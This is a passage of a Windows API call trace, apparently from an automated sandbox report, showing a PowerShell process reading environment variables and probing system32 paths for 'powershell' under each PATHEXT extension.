	[0313.916] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.916] CoTaskMemFree (pv=0x246bd0) 
	[0313.917] VirtualQuery (in: lpAddress=0x1c83da20, lpBuffer=0x1c83e8e0, dwLength=0x30 | out: lpBuffer=0x1c83e8e0*(BaseAddress=0x1c83d000, AllocationBase=0x1beb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.920] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0313.920] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.920] CoTaskMemFree (pv=0x246bd0) 
	[0313.923] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0313.923] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.923] CoTaskMemFree (pv=0x246bd0) 
	[0313.926] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0313.926] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.926] CoTaskMemFree (pv=0x246bd0) 
	[0313.943] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0313.943] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.943] CoTaskMemFree (pv=0x246bd0) 
	[0313.946] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0313.946] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.946] CoTaskMemFree (pv=0x246bd0) 
	[0313.947] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0313.947] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0313.947] CoTaskMemFree (pv=0x246bd0) 
	[0313.952] VirtualQuery (in: lpAddress=0x1c83dcd0, lpBuffer=0x1c83eb90, dwLength=0x30 | out: lpBuffer=0x1c83eb90*(BaseAddress=0x1c83d000, AllocationBase=0x1beb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.953] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0313.953] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.833] CoTaskMemFree (pv=0x246bd0) 
	[0314.835] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0314.835] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.835] CoTaskMemFree (pv=0x246bd0) 
	[0314.836] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0314.836] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.836] CoTaskMemFree (pv=0x246bd0) 
	[0314.837] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0314.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.837] CoTaskMemFree (pv=0x246bd0) 
	[0314.841] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0314.841] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0314.841] CoTaskMemFree (pv=0x246bd0) 
	[0315.523] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0315.523] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.523] CoTaskMemFree (pv=0x246bd0) 
	[0315.525] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0315.525] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.526] CoTaskMemFree (pv=0x246bd0) 
	[0315.527] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0315.527] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.527] CoTaskMemFree (pv=0x246bd0) 
	[0315.529] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0315.530] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.530] CoTaskMemFree (pv=0x246bd0) 
	[0315.531] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0315.531] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.966] CoTaskMemFree (pv=0x246bd0) 
	[0315.967] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0315.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.968] CoTaskMemFree (pv=0x246bd0) 
	[0315.969] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0315.969] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.969] CoTaskMemFree (pv=0x246bd0) 
	[0315.987] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0315.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0315.988] CoTaskMemFree (pv=0x246bd0) 
	[0316.439] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0316.439] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0316.439] CoTaskMemFree (pv=0x246bd0) 
	[0316.442] CoTaskMemAlloc (cb=0x104) returned 0x246bd0
	[0316.442] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x246bd0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0316.442] CoTaskMemFree (pv=0x246bd0) 
	[0316.442] CoTaskMemAlloc (cb=0x128) returned 0x249ad0
	[0316.442] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x249ad0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0316.443] CoTaskMemFree (pv=0x249ad0) 
	[0316.447] CoTaskMemAlloc (cb=0x20e) returned 0x1b8365e0
	[0316.447] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b8365e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0316.448] CoTaskMemFree (pv=0x1b8365e0) 
	[0316.773] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0316.775] SetErrorMode (uMode=0x1) returned 0x1
	[0316.778] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0323.848] SetErrorMode (uMode=0x1) returned 0x1
	[0324.437] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.437] SetErrorMode (uMode=0x1) returned 0x1
	[0324.438] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.446] SetErrorMode (uMode=0x1) returned 0x1
	[0324.447] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.447] SetErrorMode (uMode=0x1) returned 0x1
	[0324.447] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.455] SetErrorMode (uMode=0x1) returned 0x1
	[0324.457] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.457] SetErrorMode (uMode=0x1) returned 0x1
	[0324.457] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.465] SetErrorMode (uMode=0x1) returned 0x1
	[0324.467] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.467] SetErrorMode (uMode=0x1) returned 0x1
	[0324.467] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.302] SetErrorMode (uMode=0x1) returned 0x1
	[0325.304] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.304] SetErrorMode (uMode=0x1) returned 0x1
	[0325.304] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.313] SetErrorMode (uMode=0x1) returned 0x1
	[0325.314] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.314] SetErrorMode (uMode=0x1) returned 0x1
	[0325.315] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.323] SetErrorMode (uMode=0x1) returned 0x1
	[0325.324] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.325] SetErrorMode (uMode=0x1) returned 0x1
	[0325.325] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.333] SetErrorMode (uMode=0x1) returned 0x1
	[0325.335] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.335] SetErrorMode (uMode=0x1) returned 0x1
	[0325.335] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.262] SetErrorMode (uMode=0x1) returned 0x1
	[0326.263] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.263] SetErrorMode (uMode=0x1) returned 0x1
	[0326.264] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.271] SetErrorMode (uMode=0x1) returned 0x1
	[0326.273] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.273] SetErrorMode (uMode=0x1) returned 0x1
	[0326.273] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.281] SetErrorMode (uMode=0x1) returned 0x1
	[0326.282] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.282] SetErrorMode (uMode=0x1) returned 0x1
	[0326.282] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.290] SetErrorMode (uMode=0x1) returned 0x1
	[0326.292] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.292] SetErrorMode (uMode=0x1) returned 0x1
	[0326.292] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.300] SetErrorMode (uMode=0x1) returned 0x1
	[0326.301] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.301] SetErrorMode (uMode=0x1) returned 0x1
	[0326.301] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.167] SetErrorMode (uMode=0x1) returned 0x1
	[0327.168] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0327.169] SetErrorMode (uMode=0x1) returned 0x1
	[0327.169] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.176] SetErrorMode (uMode=0x1) returned 0x1
	[0327.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.178] SetErrorMode (uMode=0x1) returned 0x1
	[0327.178] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.178] SetErrorMode (uMode=0x1) returned 0x1
	[0327.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.179] SetErrorMode (uMode=0x1) returned 0x1
	[0327.179] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.179] SetErrorMode (uMode=0x1) returned 0x1
	[0327.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.179] SetErrorMode (uMode=0x1) returned 0x1
	[0327.179] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.180] SetErrorMode (uMode=0x1) returned 0x1
	[0327.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.180] SetErrorMode (uMode=0x1) returned 0x1
	[0327.180] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.180] SetErrorMode (uMode=0x1) returned 0x1
	[0327.180] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.180] SetErrorMode (uMode=0x1) returned 0x1
	[0327.181] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.181] SetErrorMode (uMode=0x1) returned 0x1
	[0327.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.181] SetErrorMode (uMode=0x1) returned 0x1
